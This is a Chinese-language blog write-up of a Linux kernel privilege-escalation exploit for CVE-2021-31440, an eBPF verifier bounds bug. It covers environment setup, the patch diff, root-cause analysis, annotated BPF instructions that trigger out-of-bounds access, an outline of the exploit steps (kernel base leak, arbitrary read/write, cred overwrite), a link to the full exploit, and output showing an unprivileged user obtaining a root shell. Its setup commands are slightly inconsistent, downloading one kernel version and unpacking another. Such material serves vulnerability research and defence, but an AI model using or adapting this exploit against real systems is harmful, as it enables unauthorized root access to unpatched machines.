内核安全黑客软件测试

【kernel exploit】CVE-2021-31440 e

2021-06-09  本文已影响0人  bsauce

影响版本:Linux 5.7 ~ 5.11.20 8.8分。 v5.11.21已修补,v5.11.20未修补。

测试版本:Linux-5.11 exploit及测试环境下载地址https://github.com/bsauce/kernel_exploit_factory

编译选项CONFIG_BPF_SYSCALL,config所有带BPF字样的。

General setup ---> Choose SLAB allocator (SLUB (Unqueued Allocator)) ---> SLAB

在编译时将.config中的CONFIG_E1000CONFIG_E1000E,变更为=y。参考

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.11.9.tar.xz
$ tar -xvf linux-5.11.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录:/arch/x86/boot/bzImage。

漏洞描述:eBPF模块—kernel/bpf/verifier.c__reg_combine_64_into_32() 函数,寄存器计算错误。

补丁patch

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 637462e9b6ee9..9145f88b2a0a5 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -1398,9 +1398,7 @@ static bool __reg64_bound_s32(s64 a)
 
 static bool __reg64_bound_u32(u64 a)
 {
-   if (a > U32_MIN && a < U32_MAX)
-       return true;
-   return false;
+   return a > U32_MIN && a < U32_MAX;
 }
 
 static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
@@ -1411,10 +1409,10 @@ static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
        reg->s32_min_value = (s32)reg->smin_value;
        reg->s32_max_value = (s32)reg->smax_value;
    }
-   if (__reg64_bound_u32(reg->umin_value))
+   if (__reg64_bound_u32(reg->umin_value) && __reg64_bound_u32(reg->umax_value)) {
        reg->u32_min_value = (u32)reg->umin_value;
-   if (__reg64_bound_u32(reg->umax_value))
        reg->u32_max_value = (u32)reg->umax_value;
+   }
 
    /* Intersecting with the old var_off might have improved our bounds
     * slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
diff --git a/tools/testing/selftests/bpf/verifier/array_access.c b/tools/testing/selftests/bpf/verifier/array_access.c
index 1b138cd2b187d..1b1c798e92489 100644
--- a/tools/testing/selftests/bpf/verifier/array_access.c
+++ b/tools/testing/selftests/bpf/verifier/array_access.c
@@ -186,7 +186,7 @@
    },
    .fixup_map_hash_48b = { 3 },
    .errstr_unpriv = "R0 leaks addr",
-   .errstr = "invalid access to map value, value_size=48 off=44 size=8",
+   .errstr = "R0 unbounded memory access",
    .result_unpriv = REJECT,
    .result = REJECT,
    .flags = F_NEEDS_EFFICIENT_UNALIGNED_ACCESS,

保护机制:开启KASLR/SMEP/SMAP。

利用总结:利用verifier阶段与实际执行阶段的不一致性,进行越界读写。泄露内核基址、伪造函数表、实现任意读写后篡改本线程的cred。

一、漏洞分析

该漏洞和CVE-2020-8835CVE-2020-27194这两个漏洞的原理类似,均是在32位和64位之间进行转换操作时,错误计算了寄存器的约束边界,导致可以绕过验证器检查实现越界读写。缺陷代码出现在kernel/bpf/verifier.c__reg_combine_64_into_32() 函数中,该函数是在commit_id:3f50f132d840中引入的,该功能实现了用64位寄存器上的已知范围来推断该寄存器低32位的范围,但是同样出现了类似的计算错误,该函数实现如下:

static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
{
    __mark_reg32_unbounded(reg);

    if (__reg64_bound_s32(reg->smin_value) && __reg64_bound_s32(reg->smax_value)) { // [1]
        reg->s32_min_value = (s32)reg->smin_value;
        reg->s32_max_value = (s32)reg->smax_value;
    }
    if (__reg64_bound_u32(reg->umin_value))             // [2] 只有最大值在32位的范围内,64位的最小值才是32位的最小值
        reg->u32_min_value = (u32)reg->umin_value;
    if (__reg64_bound_u32(reg->umax_value))             // [3]
        reg->u32_max_value = (u32)reg->umax_value;

    /* Intersecting with the old var_off might have improved our bounds
     * slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
     * then new var_off is (0; 0x7f...fc) which improves our umax.
     */
    __reg_deduce_bounds(reg);
    __reg_bound_offset(reg);
    __update_reg_bounds(reg);
}

static bool __reg64_bound_s32(s64 a)
{
    return a > S32_MIN && a < S32_MAX;
}
static bool __reg64_bound_u32(u64 a)
{
    if (a > U32_MIN && a < U32_MAX)
        return true;
    return false;
}

漏洞[1]处,如果smin_valuesmax_value都在带符号的32位整数范围内,则将相应的更新32位带符号范围大小,对于有符号的范围来说,这种操作是正确的。在无符号范围的相应逻辑中,对umin_valueumax_value分别在[2][3] 进行了检查,这里检测逻辑错误。例如,设置dreg->umin_value=1dreg->umax_value=1<<32,即 0x100000000,经过以上操作后,reg->u32_min_value=1reg->u32_max_value=0,高位被截断。此时reg寄存器的32位范围已经混乱,但是运行时reg的范围是正常的。

本质原因:漏洞代码认为有符号64位最小值为1时,32位最小值也为1,其实不一定,64位的最小值和32位的最小值并一定相等,两者并没有关系。例如64位有符号数的最小值为0x1ffffffff,而32位最小值就为-1了。可以联想到无符号数也是这种情况,比如无符号64位最小值也不一定等于32位无符号的最小值,例如64位无符号的最小值为0x100000000,32位无符号的最小值就为0。但看了代码,发现但开发者并没有补,这漏洞本质原因是64位数的范围不同于32位数的范围

补丁:之前commit b02709587ea3对于有符号边界的情况,已经进行了修改,也即将有符号的smin_valuesmax_value判断条件合并到一起,但没有管无符号判断的情况。正确的补丁是,将[2] [3]合并在一起,同时判断 umin_valueumax_value,也即合并为if (__reg64_bound_u32(reg->umin_value) && __reg64_bound_u32(reg->umax_value)) {

调用链do_check_main() -> do_check_common() -> do_check() (L10140) -> check_cond_jmp_op() (L8117 / L8144) -> reg_set_min_max() (L7701) -> __reg_combine_64_into_32()

二、调试分析

参考1对应的exp是CVE-2021-31440.c参考2对应的exp是CVE-2021-31440_2.c。都能利用成功。

首先将BPF_REG_7寄存器设置为1<<32,即0x10000000,并通过两个连续的NEG指令使验证器无法跟踪寄存器的范围,同时可以保证寄存器的值在运行时不变。可以通过如下BPF指令实现:

// (1) trigger vulnerability
    BPF_MAP_GET(0,BPF_REG_5),                           // 9: (79) r5 = *(u64 *)(r0 +0)                     传进r5=0x180000000

    BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),                // 11: (bf) r8 = r0
    BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),                // 12: (bf) r7 = r0
    BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),                // 13: (bf) r6 = r5

    BPF_JMP_IMM(BPF_JSGE, BPF_REG_6, 1, 1),             // 14: (75) if r6 s>= 0x1 goto pc+1     对1进行有符号比较
    BPF_EXIT_INSN(),                                    // 15: (95) exit

    BPF_LD_IMM64(BPF_REG_2, 0x8fffffff),                // 16: (18) r2 = 0x8fffffff             此时认为r6的范围为:[1,0x7fffffffffffffff]
    BPF_JMP_REG(BPF_JGT, BPF_REG_6, BPF_REG_2, 1),      // 18: (2d) if r6 > r2 goto pc+1        此时对r2进行无符号比较
    BPF_EXIT_INSN(),                                    // 19: (95) exit                        得到r2的64位范围为[0x90000000,0x7fffffffffffffff],32位范围为:[0x90000000, 0xffffffff],这里检查就出现了错误:64位操作数的比较,32位的范围应该是不清楚的,但却得到范围[0x90000000, 0xffffffff],只要传进来的数32位部分不在此范围,就可以触发漏洞

    BPF_MOV32_REG(BPF_REG_6, BPF_REG_6),                // 20: (bc) w6 = w6                     对64位进行截断,只看32位部分,范围依旧是[0x90000000, 0xffffffff]
    BPF_ALU32_IMM(BPF_ADD, BPF_REG_6, 0x70000000),      // 21: (04) w6 += 1879048192            w6+=0x70000000,得到范围为[0,0x6fffffff]
    BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 31),              // 22: (77) r6 >>= 31                   右移31位,取32位范围的符号位,因为认为范围是[0,0x6fffffff],所以r6恒为0。而实际执行时,传入0x180000000时,r6=1

三、漏洞利用

漏洞利用部分可参考CVE0-2020-8835利用,利用过程相同,只需修改部分地址,进行适配。

利用过程:介绍bpf_array->value布置,value[0]—触发漏洞的寄存器初始值;value[1]—功能选项,0泄露内核基址、1任意读、2泄露&value[0]、3任意写;value[2]—写入的值。

问题:Linux-5.11.20 版本总是无法泄露内核基址。不知道是不是新版内核加入了BPF保护措施。

exp适配

测试结果

/ $ uname -a
Linux (none) 5.11.0 #1 SMP Tue Jun 8 06:45:20 PDT 2021 x86_64 GNU/Linux
/ $ id
uid=1000(chal) gid=1000(chal) groups=1000(chal)
/ $ cd exp
/exp $ ./CVE-2021-31440
[*] sneaking evil bpf past the verifier
processed 226 insns (limit 1000000) max_states_per_insn 1 total_states 20 peak_3

[*] creating socketpair()
[*] attaching bpf backdoor to socket
leak addr: 0xffffffffbc6358a0
linux base: 0xffffffffbb600000
value addr: 0xffff8baec2eb7110
init_pid_ns addr: 0xffffffffbcc63ca0
self pid is 127
task_struct addr: 0xffff8baec12096c0
iter pid 1 ...
[+] iter task 0xffff8baec120c440 ...
iter pid 2 ...
......
[+] iter task 0xffff8baec138ad80 ...
iter pid 127 ...
got it!
get cred_addr 0xffff8baec1372480
usage: 8
getting shell!
/exp # id
uid=0(root) gid=0(root) egid=1000(chal) groups=1000(chal)
/exp #

参考

Linux内核eBPF verifier边界计算错误漏洞分析与利用(CVE-2021-31440)

CVE-2021-31440:Linux 内核eBPF提权漏洞分析(Pwn2Own 2021)

上一篇下一篇

猜你喜欢

热点阅读